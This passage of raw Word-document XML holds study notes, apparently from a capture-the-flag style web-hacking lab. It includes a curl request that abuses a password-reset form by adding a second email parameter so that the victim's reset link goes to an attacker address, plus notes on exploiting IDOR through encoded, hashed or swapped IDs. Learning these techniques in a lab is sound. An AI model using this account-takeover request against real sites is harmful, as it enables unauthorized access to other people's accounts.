        <w:t>robert</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>’</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DFAA7E2" w14:textId="77777777" w:rsidR="00C44504" w:rsidRDefault="00C44504" w:rsidP="007844D1">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="360" w:firstLine="0"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1CE7E7A3" w14:textId="2323A0A3" w:rsidR="00C44504" w:rsidRDefault="00C44504" w:rsidP="00C44504">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="360" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:t>curl ‘http://10.10.131.149/customers/reset?email=Robert%40acmeitsupport.thm’ -H ‘Content-Type: application/x-www-form-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>urlencoded</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>’ -d ‘username=</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>robert&amp;email</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>=attacker@hacker.com’</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4153D741" w14:textId="77777777" w:rsidR="00C44504" w:rsidRDefault="00C44504" w:rsidP="00C44504">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="360" w:firstLine="0"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="575DDF1F" w14:textId="47459B0D" w:rsidR="00DC515F" w:rsidRDefault="00C44504" w:rsidP="00DC515F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="360" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Create a valid username and replace </w:t>
      </w:r>
      <w:hyperlink r:id="rId18" w:history="1">
        <w:r w:rsidRPr="00D832E0">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>attacker@hacker.com</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve"> with the email address associated with this new account</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2172A2E2" w14:textId="77777777" w:rsidR="00DC515F" w:rsidRDefault="00DC515F" w:rsidP="00DC515F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="360" w:firstLine="0"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="26E421CD" w14:textId="6002A9AF" w:rsidR="00DC515F" w:rsidRDefault="00DC515F" w:rsidP="00DC515F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Insecure Direct Object Reference (IDOR)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03A07778" w14:textId="0CC34C75" w:rsidR="00C44504" w:rsidRDefault="00B274B5" w:rsidP="007844D1">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="360" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:t>Encoded IDs – base64 is most commonly used</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59ECAF28" w14:textId="413475E1" w:rsidR="00B274B5" w:rsidRDefault="00B274B5" w:rsidP="007844D1">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="360" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:t>Hashed IDs – md5 is most commonly used</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CC86212" w14:textId="3B4A428D" w:rsidR="00B274B5" w:rsidRDefault="00B274B5" w:rsidP="007844D1">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="360" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Unpredictable IDs – 2 accounts </w:t>
      </w:r>
      <w:r w:rsidR="000F3F1D">
        <w:t>and swap the id numbers between them</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F9199E9" w14:textId="77777777" w:rsidR="000F3F1D" w:rsidRDefault="000F3F1D" w:rsidP="007844D1">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="360" w:firstLine="0"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7C1212AE" w14:textId="77777777" w:rsidR="000F3F1D" w:rsidRPr="00F2268A" w:rsidRDefault="000F3F1D" w:rsidP="007844D1">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="360" w:firstLine="0"/>
      </w:pPr>
    </w:p>
    <w:sectPr w:rsidR="000F3F1D" w:rsidRPr="00F22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2424"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="6C820FAE"/>
    <w:lvl w:ilvl="0" w:tplc="8712298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62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0674744">
    <w:abstractNumId w:val="0"/>
  </w:num>
  <w:num w:numId="2" w16cid:durableId="29399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15"/>
    <w:rsid w:val="000F3F1D"/>
    <w:rsid w:val="00155535"/>
    <w:rsid w:val="001C13C4"/>
    <w:rsid w:val="00222D15"/>
    <w:rsid w:val="003206CD"/>
    <w:rsid w:val="003E28F2"/>
    <w:rsid w:val="00516682"/>
    <w:rsid w:val="005F10F6"/>
    <w:rsid w:val="00644FF9"/>
    <w:rsid w:val="00694B81"/>
    <w:rsid w:val="006D5D2A"/>
    <w:rsid w:val="006E3AAD"/>
    <w:rsid w:val="00781771"/>
    <w:rsid w:val="007844D1"/>
    <w:rsid w:val="00790ACC"/>
    <w:rsid w:val="008B2E84"/>
    <w:rsid w:val="00970E22"/>
    <w:rsid w:val="009F542B"/>
    <w:rsid w:val="00B274B5"/>
    <w:rsid w:val="00BD46B7"/>
    <w:rsid w:val="00BF3153"/>
    <w:rsid w:val="00C44504"/>
    <w:rsid w:val="00DC515F"/>
    <w:rsid w:val="00EB36F6"/>
    <w:rsid w:val="00F2268A"/>
    <w:rsid w:val="00FA24B1"/>
    <w:rsid w:val="00FD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B73F"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{5B9ACA41-4E96-4951-90B8-CC38F9E9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343"/>
    <w:pPr>
      <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
      <w:ind w:firstLine="36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343"/>
    <w:pPr>
      <w:keepNext/>
      <w:keepLines/>
      <w:numPr>
        <w:numId w:val="1"/>
      </w:numPr>
      <w:ind w:left="0" w:firstLine="360"/>
      <w:jc w:val="both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D0343"/>
    <w:pPr>
      <w:outlineLvl w:val="1"/>
    </w:pPr>
    <w:rPr>
      <w:b w:val="0"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43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343"/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15"/>
    <w:pPr>
      <w:numPr>
        <w:ilvl w:val="1"/>
      </w:numPr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6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ppalyzer.com/" TargetMode="External"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://10.10.51.251" TargetMode="External"/><Relationship Id="rId18" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="mailto:attacker@hack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site.org" TargetMode="External"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://10.10.51.251" TargetMode="External"/><Relationship Id="rId17" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://10.10.131.149/customers/reset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10.131.149/customers/login%20-fc%2020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ebsite.org/favicon/images/favicon.ico" TargetMode="External"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://crt.sh" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://wiki.owasp.org/index.php/OWASP_favicon_database" TargetMode="External"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/ffuf/ffuf" TargetMode="External"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/danielmiessler/Sec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chive.org/web/" TargetMode="External"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://10.10.131.149/customers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8</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2025-03-08T06:23:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2025-03-10T18:34:00Z</dcterms:modified>
</cp:coreProperties>
</file>